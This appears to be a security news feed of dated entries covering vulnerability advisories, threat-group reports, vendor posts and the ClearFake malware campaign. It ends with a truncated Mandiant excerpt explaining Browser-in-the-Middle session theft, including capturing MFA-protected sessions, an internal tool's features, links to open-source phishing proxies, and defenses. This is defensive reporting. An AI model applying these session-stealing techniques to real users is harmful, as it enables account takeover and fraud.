and making it easier to act decisively to protect your organization or realize your operational mission. Infrastructure Intelligence is Vital for Effective, Modern Cybersecurity The value of HYAS Infrastructure Intelligence lies in its ability to provide actionable, real-time context that amplifies an organization’s security posture. Here’s why it matters: 1. Proactive Threat Mitigation Unlike much of the noisy intelligence available to organizations today, Infrastructure Intelligence equips teams with the tools to detect attacks in their early stages (and even before they are launched) by shining a light on adversary infrastructure. By seeing these connections you can anticipate the attacker's moves and proactively block attacks. 2. Improved Incident Response By correlating infrastructure data with threat actor activity, organizations can quickly identify root causes, contain threats, and reduce response times. This expedites investigations and enhances the speed and accuracy of remediation efforts. 3. Enhanced Decision-Making With enriched datasets and contextual insights, decision-makers gain a comprehensive view of the cyber threat landscape. This ensures not only precise actions but also informed long-term strategies for enterprise cybersecurity. 4. Greater ROI on Security Investments Infrastructure Intelligence acts as a force multiplier for existing security tools. Integrating these insights with SIEMs, threat hunting platforms, or DNS security solutions enhances ROI by improving overall effectiveness. How Organizations Are Applying Infrastructure Intelligence Real-world use cases illustrate the tangible benefits of this intelligence. Here are two examples: 1. Fraud Prevention in Financial Institutions A major European bank prevented twice the amount of fraud it had previously by leveraging Infrastructure Intelligence to identify and block suspicious account infrastructure, saving millions in downstream fraud costs. 2. Defending Against APT Groups Organizations dealing with advanced persistent threat (APT) campaigns, such as Typhoon cyber groups targeting critical infrastructure, have used Infrastructure Intelligence to uncover C2 servers and disrupt adversary tactics before widespread damage occurs. These stories underscore the importance of HYAS Infrastructure Intelligence in safeguarding digital assets, protecting customers, and staying resilient in the face of sophisticated adversaries. Take the Next Step in Threat Defense Adversaries are getting smarter, faster, and more resourceful. To stay ahead, security leaders must equip their threat hunting and cyber fraud teams with the best tools available. HYAS Infrastructure Intelligence offers unmatched insight into adversary infrastructure, empowering teams to act decisively and protect their organizations. If you’re looking to enhance your threat intelligence capabilities and learn more about HYAS Infrastructure Intelligence, now’s the time. Rig out your team with the only provider of Infrastructure Intelligence to uncover hidden threats, preempt attacks, and achieve a higher level of operational resiliency. Learn more aboutHYAS Insight andcontact HYAS today

https://www.hyas.com/blog/what-is-infrastructure-intelligence
MirrorFace updates toolset, expands targeting to Europe
2025-03-18T15:45:18Z | 1742312718

The group's Operation AkaiRyū begins with targeted spearphishing emails that use the upcoming World Expo 2025 in Osaka, Japan, as a lure

https://www.welivesecurity.com/en/videos/mirrorface-updates-toolset-expands-reach-europe/
SAML roulette: the hacker always wins
2025-03-18T14:55:43Z | 1742309743

Introduction In this post, we’ll show precisely how to chain round-trip attacks and namespace confusion to achieve unauthenticated admin access on GitLab Enterprise by exploiting the ruby-saml library

https://portswigger.net/research/saml-roulette-the-hacker-always-wins
Huawei Named a Customers' Choice in 2025 Gartner® Peer Insights™ Voice of the Customer
2025-03-18T14:29:00Z | 1742308140

Huawei was named a Customers' Choice in 2025 Gartner® Peer Insights™ Voice of the Customer for Enterprise Backup and Recovery Software Solutions.

//www.huawei.com/en/news/2025/3/oceanprotect-gartner
APIs: The Gateway to Dynamic 5G Networks
2025-03-18T13:52:17Z | 1742305937

According to Ericsson, the opportunity created by mobile network application programming interfaces (APIs) will grow to more than $20 billion by 2028. APIs are ways for different types of software applications to communicate with each other. They are critical to a dynamic 5G network ecosystem and the secret sauce that...

https://www.netscout.com/blog/apis-gateway-dynamic-5g-networks
CounterCraft v4: Massive scale. Mission critical. Made simple.
2025-03-18T12:45:30Z | 1742301930

What if you could deploy deception in minutes? At a global scale? What if you didn’t have to worry about endpoints and VLANs? This is no longer a hypothetical—with the release of CounterCraft v4, it’s reality. Cyber defenders need more than just tools—they need comprehensive solutions that scale with their mission. CounterCraft v4 is here, […] The post CounterCraft v4: Massive scale. Mission critical. Made simple. appeared first on CounterCraft.

https://www.countercraftsec.com/blog/threat-intelligence-powered-by-deception-massive-scale/
2025 Cato CTRL™ Threat Report: Top 4 AI Predictions for the Year Ahead
2025-03-18T12:29:00Z | 1742300940

Today, Cato Networks published the 2025 Cato CTRL Threat Report. It is the inaugural annual threat report from Cato CTRL, the Cato Networks threat intelligence team. The key theme for this year’s report is artificial intelligence (AI), which reflects the current cybersecurity landscape where AI usage is skyrocketing among vendors—and threat actors. Within the report, we... The post 2025 Cato CTRL™ Threat Report: Top 4 AI Predictions for the Year Ahead appeared first on Cato Networks.

https://www.catonetworks.com/blog/2025-cato-ctrl-threat-report-top-4-ai-predictions-for-the-year-ahead/
Operation AkaiRyū: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor
2025-03-18T10:00:00Z | 1742292000

ESET researchers uncovered MirrorFace activity that expanded beyond its usual focus on Japan and targeted a Central European diplomatic institute with the ANEL backdoor

https://www.welivesecurity.com/en/eset-research/operation-akairyu-mirrorface-invites-europe-expo-2025-revives-anel-backdoor/
EfficientIP and ServiceNow Integration: Streamline Workflows
2025-03-18T09:57:31Z | 1742291851

The new EfficientIP and ServiceNow integration is now available between EfficientIP’s SOLIDserver DDI and ServiceNow’s ITSM workflow solution, enabling the seamless use of IPAM data in ServiceNow business workflows. Using Flow Designer and the EfficientIP SOLIDserver spoke, ITOps teams can automate processes easily for change management, troubleshooting and incident resolution, and service delivery. Why Integrate… The post EfficientIP and ServiceNow Integration: Streamline Workflows appeared first on EfficientIP.

https://efficientip.com/blog/efficientip-and-servicenow-integration-streamline-workflows/
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 11/2025
2025-03-18T08:48:13Z | 1742287693

NCSC-FI Annual Review Published! This week, we are also sharing insights into February’s Cyber Weather and new instructions for reviewing Microsoft 365 Entra ID settings.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-112025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 11/2025
2025-03-18T08:48:13Z | 1742287693

NCSC-FI Annual Review Published! This week, we are also sharing insights into February’s Cyber Weather and new instructions for reviewing Microsoft 365 Entra ID settings.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-112025
ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery
2025-03-18T08:00:00Z | 1742284800

ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver malware through the drive-by download technique. When it first emerged in July 2023, the injected code was designed to display a fake web browser download page, tricking users into downloading counterfeit browser updates. By May 20241, ClearFake adopted the new social engineering tactic ClickFix, displaying fake error messages in the web browser and deceiving users into copying and executing a given malicious PowerShell code that finally infected their systems. The Sekoia Threat Detection & Research (TDR) team discovered that since December 2024, ClearFake has included new lures. This latest variant uses fake reCAPTCHA or Cloudflare Turnstile verifications, along with fake technical issues, to trick users into resolving these CAPTCHA challenges and finally executing malicious PowerShell code. La publication suivante ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery est un article de Sekoia.io Blog.

https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/
Hillstone W-Series Web Application Firewall
2025-03-18T08:00:00Z | 1742284800

Hillstone W-Series Web Application Firewall (WAF) provides enterprise-class, comprehensive security for web servers, applications and APIs. It defends against attacks at both the network and application layers, providing protections against DDoS, the OWASP Top 10 threats, and bot attacks, for example. In addition, the WAF validates APIs against the schema defined in OpenAPI, and automatically […] The post Hillstone W-Series Web Application Firewall appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/resources/hillstone-w-series-web-application-firewall/
UAC-0200: Шпигунство за оборонно-промисловим комплексом за допомогою DarkCrystal RAT (CERT-UA#14045)
2025-03-18T06:30:33Z | 1742279433

Урядовою командою реагування на компʼютерні надзвичайні події CERT-UA фіксуються непоодинокі випадки здійснення цільових кібератак як у відношенні співробітників підприємств оборонно-промислового комплексу, так й окремих представників Сил оборони України.

https://cert.gov.ua/article/6282737
ZDI-25-148: (0Day) Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.0.

http://www.zerodayinitiative.com/advisories/ZDI-25-148/
ZDI-25-149: Adobe Acrobat Reader DC AcroForm Out-Of-Bounds Read Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-271561.

http://www.zerodayinitiative.com/advisories/ZDI-25-149/
ZDI-25-150: Microsoft Windows MSC File Insufficient UI Warning Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2025-26633.

http://www.zerodayinitiative.com/advisories/ZDI-25-150/
ZDI-25-151: Progress Software Kemp LoadMaster mangle Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software Kemp LoadMaster. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-1758.

http://www.zerodayinitiative.com/advisories/ZDI-25-151/
ZDI-25-152: Rockwell Automation Arena Simulation DOE File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation Arena Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12130.

http://www.zerodayinitiative.com/advisories/ZDI-25-152/
ZDI-25-153: Autodesk AutoCAD SLDPRT File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1431.

http://www.zerodayinitiative.com/advisories/ZDI-25-153/
ZDI-25-154: Autodesk AutoCAD 3DM File Parsing Use-After-Free Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1432.

http://www.zerodayinitiative.com/advisories/ZDI-25-154/
ZDI-25-155: Autodesk AutoCAD MODEL File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1433.

http://www.zerodayinitiative.com/advisories/ZDI-25-155/
ZDI-25-156: Autodesk AutoCAD SLDPRT File Parsing Memory Corruption Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1430.

http://www.zerodayinitiative.com/advisories/ZDI-25-156/
ZDI-25-157: Autodesk AutoCAD MODEL File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1651.

http://www.zerodayinitiative.com/advisories/ZDI-25-157/
ZDI-25-158: Autodesk AutoCAD CATProduct File Parsing Uninitialized Variable Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1650.

http://www.zerodayinitiative.com/advisories/ZDI-25-158/
ZDI-25-159: Autodesk AutoCAD CATPRODUCT File Parsing Uninitialized Variable Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1649.

http://www.zerodayinitiative.com/advisories/ZDI-25-159/
ZDI-25-160: Autodesk AutoCAD MODEL File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1429.

http://www.zerodayinitiative.com/advisories/ZDI-25-160/
ZDI-25-161: Autodesk AutoCAD CATPART File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1428.

http://www.zerodayinitiative.com/advisories/ZDI-25-161/
ZDI-25-162: Autodesk AutoCAD CATProduct File Parsing Uninitialized Variable Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1427.

http://www.zerodayinitiative.com/advisories/ZDI-25-162/
ZDI-25-163: Autodesk AutoCAD MODEL File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk AutoCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1652.

http://www.zerodayinitiative.com/advisories/ZDI-25-163/
ZDI-25-164: Apple SceneKit Out-Of-Bounds Read Information Disclosure Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple SceneKit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2025-24149.

http://www.zerodayinitiative.com/advisories/ZDI-25-164/
ZDI-25-165: Apple macOS ImageIO JPG File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. Interaction with the ImageIO framework is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2024-54499.

http://www.zerodayinitiative.com/advisories/ZDI-25-165/
ZDI-25-166: Apple macOS libFontParser Glyph Mapping Out-Of-Bounds Read Information Disclosure Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. Interaction with the libFontParser library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2024-54486.

http://www.zerodayinitiative.com/advisories/ZDI-25-166/
ZDI-25-167: Apple macOS ICC Profile Parsing Out-Of-Bounds Read Information Disclosure Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2025-24139.

http://www.zerodayinitiative.com/advisories/ZDI-25-167/
ZDI-25-168: Apple macOS MOV File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-24123.

http://www.zerodayinitiative.com/advisories/ZDI-25-168/
ZDI-25-169: Apple macOS WindowServer Unchecked Input for Loop Condition Denial-of-Service Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Apple macOS. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2024-54497.

http://www.zerodayinitiative.com/advisories/ZDI-25-169/
ZDI-25-170: Apple macOS WindowServer Denial-of-Service Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2024-54501.

http://www.zerodayinitiative.com/advisories/ZDI-25-170/
ZDI-25-171: Apple macOS ImageIO Pixel Conversion Out-Of-Bounds Read Information Disclosure Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. Interaction with the ImageIO framework is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2024-54500.

http://www.zerodayinitiative.com/advisories/ZDI-25-171/
ZDI-25-172: Apple macOS MOV File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
2025-03-18T05:00:00Z | 1742274000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-24124.

http://www.zerodayinitiative.com/advisories/ZDI-25-172/
Resurgence of In-The-Wild Activity Targeting Critical ServiceNow Vulnerabilities
2025-03-18T00:00:00Z | 1742256000

GreyNoise has identified a notable resurgence of in-the-wild activity targeting three ServiceNow vulnerabilities: "Resurgence of in-the-wild Activity targeting critical ServiceNow vulns. Overwhelming majority of traffic hitting Israel.

https://www.greynoise.io/blog/in-the-wild-activity-targeting-critical-servicenow-vulnerabilities
GeekWeek 10
2025-03-17T18:50:49Z | 1742237449

https://cyber.gc.ca/en/geekweek/geekweek-10
2025 Cato CTRL™ Threat Report
2025-03-17T16:15:31Z | 1742228131

The post 2025 Cato CTRL™ Threat Report appeared first on Cato Networks.

https://www.catonetworks.com/resources/2025-cato-ctrl-threat-report-rise-of-zero-knowledge-threat-actor/
Build Physical Security Superpowers with Smart Bullet Cameras and Multi-Imagers
2025-03-17T15:00:00Z | 1742223600

Physical security breaches are of top concern for CSOs. Protecting your organization requires an approach as proactive and advanced as cybersecurity. But with the latest smart cameras, it doesn’t have to add complexity. The post Build Physical Security Superpowers with Smart Bullet Cameras and Multi-Imagers appeared first on The Meraki Blog.

https://meraki.cisco.com/blog/2025/03/build-physical-security-superpowers-with-smart-bullet-cameras-and-multi-imagers/
Vulnerability in NASK-PIB BotSense software
2025-03-17T15:00:00Z | 1742223600

Improper Neutralization of Value Delimiters vulnerability (CVE-2025-1774) has been found in NASK - PIB BotSense software.

https://cert.pl/en/posts/2025/03/CVE-2025-1774/
The Increasingly Complex Job of Optimizing Network Performance
2025-03-17T13:54:29Z | 1742219669

As digitization efforts progress and network complexity increases, IT organizations are feeling the heat to ensure flawless performance. A recent study found that over the last three years, 96 percent of enterprise ITOps teams have been under pressure to work at least 25 percent faster, and more than half indicated...

https://www.netscout.com/blog/increasingly-complex-job-optimizing-network-performance
The CISO’s Balancing Act: Delegation Without Losing Control
2025-03-17T13:48:54Z | 1742219334

In today’s fast-paced cybersecurity landscape, CISOs (Chief Information Security Officers) face an undeniable reality: they simply cannot oversee every detail of their security operations. With expanding attack surfaces, regulatory pressures, and the need for 24/7 vigilance, micromanagement is neither sustainable nor effective. Instead, modern CISOs must master the art of delegation while maintaining control—an intricate... The post The CISO’s Balancing Act: Delegation Without Losing Control appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-cisos-balancing-act-delegation-without-losing-control/
Cisco Paves the Way with Agentic AI Collaboration
2025-03-17T13:00:00Z | 1742216400

Furthering Cisco’s agentic AI journey, Cisco expands its Collaboration portfolio to include the general availability of Webex AI Agent.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/cisco-paves-the-way-with-agentic-ai-collaboration.html
Bypassing Authentication Like It’s The ‘90s - Pre-Auth RCE Chain(s) in Kentico Xperience CMS
2025-03-17T12:24:54Z | 1742214294

I recently joined watchTowr, and it is, therefore, time - time for my first watchTowr Labs blogpost, previously teased in a tweet of a pre-auth RCE chain affecting some ‘unknown software’.Joining the team, I wanted to maintain the trail of destruction left by the watchTowr Labs team,

https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/
AI's biggest surprises of 2024 | Unlocked 403 cybersecurity podcast (S2E1)
2025-03-17T10:00:00Z | 1742205600

Here's what's been hot on the AI scene over the past 12 months, how it's changing the face of warfare, and how you can fight AI-powered scams

https://www.welivesecurity.com/en/videos/ai-biggest-surprises-2024-unlocked-403-cybersecurity-podcast-season-2-episode-1/
Proactive Risk Monitoring: The Key to OT-SOC Efficiency & Cyber Resilience
2025-03-17T08:00:21Z | 1742198421

We have many partners that Provides OT-SOC services (MDR) utilizing our platforms and the number is growing rapidly. Some of them are pure play OT but many of them are IT- SOC that are building up another revenue stream by handling OT alerts. The step for them can be quite large as this is 2 […] The post Proactive Risk Monitoring: The Key to OT-SOC Efficiency & Cyber Resilience appeared first on Radiflow.

https://www.radiflow.com/blog/proactive-risk-monitoring-the-key-to-ot-soc-efficiency-cyber-resilience/
Get Ready for Search Central Live Asia Pacific 2025
2025-03-17T05:30:00Z | 1742189400

Hello 2025! (Yeah, we know, time flies!) We've had some exciting plans in the works for Search Central Live (SCL) Asia Pacific this year, and we're super excited to let you in on what we've been up to. We've been listening closely to your feedback, and we're cooking up something different than what we usually do–something bigger, deeper, and more tailored to you!

https://developers.google.com/search/blog/2025/03/search-central-live-deep-dive-apac-2025
ZDI-25-146: (0Day) NI FlexLogger usiReg URI File Parsing Directory Traversal Remote Code Execution Vulnerability
2025-03-17T05:00:00Z | 1742187600

This vulnerability allows remote attackers to create arbitrary files on affected installations of NI FlexLogger. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2449.

http://www.zerodayinitiative.com/advisories/ZDI-25-146/
ZDI-25-147: (0Day) NI Vision Builder AI VBAI File Processing Missing Warning Remote Code Execution Vulnerability
2025-03-17T05:00:00Z | 1742187600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of NI Vision Builder AI. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2450.

http://www.zerodayinitiative.com/advisories/ZDI-25-147/
BitM Up! Session Stealing in Seconds Using the Browser-in-the-Middle Technique
2025-03-17T05:00:00Z | 1742187600

Written by: Truman Brown, Emily Astranova, Steven Karschnia, Jacob Paullus, Nick McClendon, Chris Higgins Executive Summary The Rise of Browser in the Middle (BitM): BitM attacks offer a streamlined approach, allowing attackers to quickly compromise sessions across various web applications. MFA Remains Crucial, But Not Invulnerable: Multi-factor authentication (MFA) is a vital security measure, yet sophisticated social engineering tactics now effectively bypass it by targeting session tokens. Strong Defenses Are Imperative: To counter these threats, organizations must implement robust defenses, including hardware-based MFA, client certificates, and FIDO2. Social Engineering and Multi-Factor Authentication Social engineering campaigns pose a significant threat to organizations and businesses as they capitalize on human vulnerabilities by exploiting cognitive biases and weaknesses in security awareness. During a social engineering campaign, a red team operator typically targets a victim's username and password. A common mitigation used to address these threats are security measures like multi-factor authentication (MFA).  MFA is a security measure that requires users to provide two or more methods of authentication when logging in to an account or accessing a protected resource. This makes it more difficult for unauthorized users to gain access to sensitive information even if they have obtained one of the factors, such as a password. Red team operators have long targeted various methods of obtaining user session tokens with a high degree of success. Once a user has completed MFA and is successfully authenticated, the application typically stores a session token in the user's browser to maintain their authenticated state. Stealing this session token is the equivalent of stealing the authenticated session, meaning an adversary would no longer need to perform the MFA challenge. This makes session tokens a valuable target for adversaries and red team operators alike. Techniques for Targeting Tokens Red team operators can target these session tokens using a variety of tools and techniques. The most common tool is Evilginx2, a transparent proxy where a red team operator's server acts as an intermediary between the victim and the targeted service. Any HTTP requests made by the victim are captured by the phishing server and then forwarded directly to the intended website. However, before returning the responses to the victim, the server subtly modifies them by replacing any references to the legitimate domain with the phishing domain. This manipulation allows operators to not only capture the victim's login credentials from POST requests but also to extract session cookies (tokens) from the server's response headers after the victim has completed authentication and MFA prompts. During a red team engagement, a consultant working within a constrained time frame is tasked with achieving a series of objectives that cover a broad spectrum, such as retrieving sensitive employee data (e.g., personally identifiable information [PII]) or even a complete takeover of the target's Active Directory infrastructure. The red team's mission is to simulate a real-world attack and evaluate the effectiveness of the client's security measures by exploiting vulnerabilities and employing various techniques to gain unauthorized access. It is rare for a consultant to deploy a transparent proxy targeting a custom application unique to a client due to the high degree of customization that can be involved during setup. Transparent proxies require significant customization and configuration to work against a targeted application. This process can be time-consuming, complex, and error-prone, especially for a red team operator targeting multiple applications. Often the operator will have to fully understand the way the application handles sessions and authentication before being able to successfully target the application. Once an application has been fully reduced to a template that is usable with the chosen transparent proxy, red team operators will still need to keep the templates up to date introducing a large amount of overhead. Dynamic Targeting with Browser in the Middle  According to MITRE, Browser in the Middle (BitM) "uses the inherent functionalities of a web browser to convince the victim they are browsing normally under the assumption that the connection is secure. All the actions performed by the victim in the open window are actually performed on the machine of the adversary." In short, this attack is similar to a victim sitting in front of an attacker's computer and signing in for them; all of the data required to authenticate to the application is now under the attacker's control.  BitM offers a number of advantages for red team operators when compared to traditional methods of stealing authenticated session tokens. A pivotal benefit of employing a BitM framework lies in its rapid targeting capability, allowing it to reach any website on the web in a matter of seconds and with minimal configuration. Once an application is targeted through a BitM tool or framework, the legitimate site is served through an attacker-controlled browser. This makes the distinction between a legitimate and a fake site exceptionally challenging for a victim. From the perspective of an adversary, BitM allows for a simple yet effective means of stealing sessions protected by MFA. BitM Overview Mandiant has developed an internal tool (Delusion) for performing BitM attacks, enabling an operator to target a specific application without possessing prior knowledge about the authentication protocols employed by the application. Delusion includes a number of unique features that enable session-stealing attacks at scale: Support for storing and downloading Firefox browser profiles, making session stealing trivial, no cookie import required A monitor page where an operator can interact with a victim's session in real time The ability to scale containers and automatically add them to a load balancer for large-scale phishing campaigns Two modes of operation designed for either vishing or phishing (Manual and Automatic) Bookmarks to simplifying deploying against multiple websites Tagging for campaign management Session recording for reporting purposes Delusion was inspired by the following blog posts and research papers. Development would not have been possible without their commitment to publishing and releasing research. https://mrd0x.com/bypass-2fa-using-novnc/ https://link.springer.com/article/10.1007/s10207-021-00548-5 https://fhlipzero.io/blogs/6_noVNC/noVNC.html  Mandiant has chosen not to publish Delusion due to weaponization concerns. If you are interested in how your application or portal performs against BitM and other session-stealing threats, check out these open source projects: https://github.com/JoelGMSec/EvilnoVNC https://github.com/fkasler/cuddlephish https://github.com/kgretzky/evilginx2  BitM Session Stealing in Action BitM is well suited for targeting applications that allow for initial access to privileged networks or environments through Virtual Desktop Infrastructure (VDI). BitM makes deploying session-stealing infrastructure against any publicly exposed infrastructure very easy. Targeting a login portal is as simple as specifying the portal information and clicking "Deploy", as shown in Figure 1. Figure 2 shows the view of an operator during an engagement. An operator can view any actions taken on the phishing site in real time. Figure 3 shows the view of a victim authenticating through the phishing site. Figure 4 shows an example of a captured session; despite there being no cookies, the browser profile will still contain everything used by the application to maintain the authenticated state. Figure 5 shows the downloaded browser profile being opened and the session being resumed. Figure 1: Deploying the victim container Figure 2: Monitoring the victim container Figure 3: Victim authenticating to app Figure 4: Captured session and keylogger output Figure 5: Using the captured Firefox session Figure 6: Browser-in-the-Middle attack flow Figure 6 shows a typical attack scenario where a victim is lured to a malicious website through a phone call, text message or email (1). Upon visiting the site given by the operator, the victim's connection is routed through a load balancer to an available proxied browser (2). The victim unknowingly interacts with the proxied browser, entering their credentials, including any MFA tokens (3). Once the attacker observes a successful login, the victim is disconnected from the proxied browser, and their session is compromised (4). Defense Considerations To defend against such attacks, organizations can adopt the following strategies. Requiring client certificates for authentication can deter BitM attacks, as these certificates are typically bound to specific devices and cannot be easily manipulated by attackers. Similarly, hardware-based MFA solutions like FIDO2 compatible security keys offer strong protection against BitM. Figure 7 depicts a typical FIDO2 authentication flow. Figure 7: FIDO2 authentication flow FIDO2 and/or certificate-based authentication halts an attack scenario, as shown in Figure 8. The attacker's browser is attempting to steal a session from the legitimate site. The attacker's site requests a page from the website it is trying to steal a session from. The website requires a FIDO2 key or 